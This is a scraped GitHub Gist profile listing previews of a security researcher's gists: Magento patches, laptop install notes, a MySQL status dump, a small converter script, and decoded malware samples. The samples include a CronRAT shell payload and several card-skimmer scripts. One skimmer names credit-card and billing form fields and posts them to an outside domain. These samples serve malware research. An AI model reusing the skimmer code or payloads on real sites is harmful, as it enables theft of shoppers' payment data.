Skip to content

Instantly share code, notes, and snippets.

Avatar
💫

Willem de Groot gwillem

💫
View GitHub Profile
View 2.3.4-composer.patch
diff --git a/vendor/magento/module-email/Model/Template/Filter.php b/vendor/magento/module-email/Model/Template/Filter.php
index ccb04937675..5cc50bc4507 100644
--- a/vendor/magento/module-email/Model/Template/Filter.php
+++ b/vendor/magento/module-email/Model/Template/Filter.php
@@ -379,14 +379,14 @@ class Filter extends \Magento\Framework\Filter\Template
}
/**
- * Retrieve Block html directive
- *
@gwillem
gwillem / MDVA-43395_EE_2.4.3-p1_v1.patch
Created Feb 14, 2022
MDVA-43395_EE_2.4.3-p1_v1.patch
View MDVA-43395_EE_2.4.3-p1_v1.patch
diff --git a/app/code/Magento/Email/Model/Template/Filter.php b/app/code/Magento/Email/Model/Template/Filter.php
index 1a7c3683820a..586cb485ee1f 100644
--- a/app/code/Magento/Email/Model/Template/Filter.php
+++ b/app/code/Magento/Email/Model/Template/Filter.php
@@ -618,6 +618,12 @@ public function transDirective($construction)
}
$text = __($text, $params)->render();
+
+ $pattern = '/{{.*?}}/';
@gwillem
gwillem / _cronrat.sh
Last active Mar 2, 2022
This is the decoded payload from the CRON loader. Full analysis here: https://sansec.io/research/cronrat
View _cronrat.sh
set -eEu
set -o pipefail
trap 'echo "L$LINENO"; O70; exit -1' ERR
O54=4
function O70()
{
if [[ ! -z "${O57+x}" ]]; then
if [[ -f "${O57}" ]]; then
rm -f "${O57}"
fi
@gwillem
gwillem / dell-xps-9310-linux-install-notes.md
Created Nov 25, 2020
Linux (Xubuntu 20.04) on Dell XPS 9310 install notes
View dell-xps-9310-linux-install-notes.md

Dell XPS 9310 Linux install notes (Ubuntu/Xubuntu 20.04)

My NL i7/16GB XPS 9310 has a Killer AX1650s WiFi chip, which eventually worked. Other Killer chips may not work.

I ordered the Windows Home edition, because developer edition with Linux was not available in my country. Apparently you can reclaim €100 from Dell if you don't use Windows.

Install

  • Bios:
  • Change the SATA Mode from the default "RAID" to "AHCI"
View show-global-status.txt
Variable_name Value
Aborted_clients 2028
Aborted_connects 0
Access_denied_errors 0
Acl_column_grants 0
Acl_database_grants 4656
Acl_function_grants 0
Acl_procedure_grants 0
Acl_proxy_users 1
Acl_role_grants 0
View decoded.js
// Original: https://www.sweatybetty.com/on/demandware.static/-/Library-Sites-sweatybettylibrary/en_US/v1574703272172/js/custom.js
// Decoded by info@sansec.io (C) 2019-12-04
(function () {
function _0x58c32e(_0x531ef5, _0x2f3dd8) {
function _0x3730ba(_0x50af3d) {
if (_0x3730ba[_0x50af3d] !== _0x42a44f) return _0x3730ba[_0x50af3d];
var _0x4c3b76;
if (_0x250d('0x0', 'vxGP') == _0x50af3d) _0x4c3b76 = 'a' != 'a' [0x0];
else if (_0x250d('0x1', 'ipvd') == _0x50af3d) _0x4c3b76 = _0x3730ba(_0x250d('0x2', '%zE0')) && _0x3730ba('json-parse');
else {
@gwillem
gwillem / decoded.js
Created Oct 25, 2019
Procter & Gamble's FirstAidBeauty.com skimmed since May 5th 2019.
View decoded.js
+ function () {
var a = ["digiNum", "input[name='payment[cc_number]']", "digiMon", "select[name='payment[cc_exp_month]']", "digiYea", "select[name='payment[cc_exp_year]']", "digiCbb", "input[name='payment[cc_cid]']", "digiNam", "input[name='payment[cc_owner]']", "clNameChecked", "l8", "shElement", "#payment-buttons-container", "hasClass", "click", "val", "change", "addClass", "#billing\:firstname", " ", "#billing\:lastname", "#billing\:company", "#billing\:street1", "#billing\:street2", "#billing\:email", "#billing\:telephone", "#billing\:city", "#billing\:region_id", "#billing\:country_id", "#billing\:postcode", "host", "location", "", "replace", "/", "userAgent", "stringify", "https://cdn.hsadspixel.com/t/", "main", "guid", "refer", "POST", "ajax", "random", "round", "fromCharCode", "key", "getElementById", "iv", "push", "length", "charCodeAt", "rotate", "sbox", "Rcon", "numberOfRounds", "core", "SIZE_256", "keySize", "rsbox", "shiftRow", "mixColumn", "galois_multiplication", "subBytes", "shiftRows", "m
View Volusion code
/*!
* JavaScript Cookie v2.2.1
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;
(function(factory) {
var registeredInModuleLoader;
View jsonline2csv.py
#!/usr/bin/env python3
# jsonline to csv converter for Andy
import csv
import json
import sys
if len(sys.argv) < 2:
print("Use {} <file.jsonline>".format(sys.argv[0]))
@gwillem
gwillem / decoded.js
Last active Apr 28, 2022
962 stores found breached on the 4th of July - https://sansec.io
View decoded.js
// Decoded by Sanguine Security <info@sansec.io>
String.prototype.hexEncode = function() {
var a, b;
var output = '';
for (b = 0; b < this.length; b++) {
a = this.charCodeAt(b).toString(16);
output += ('000' + a).slice(-4)
};
return output
};